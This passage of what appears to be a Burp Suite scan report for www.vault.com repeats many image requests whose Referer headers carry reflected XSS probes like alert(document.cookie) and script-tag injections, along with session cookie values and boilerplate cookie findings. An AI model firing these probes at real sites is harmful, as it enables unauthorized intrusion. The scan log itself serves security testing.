GET /images/sponsors/schools/sponsor_1088.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_1398.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_1727.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2105.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2282.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2492.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_251.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2983.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_3276.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_3672.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_507.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_517.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_790.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_1026.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_10358.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_10404.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_1815.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_25318.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_377.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_385.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_43868.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_569724.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_6100.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_6603.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_7285.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_819.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_906.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_9066.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_923.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/store/covers/759-small.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/store/covers/888-small.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/subheader_background2.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/subheader_bottom2.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/subheader_top3.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
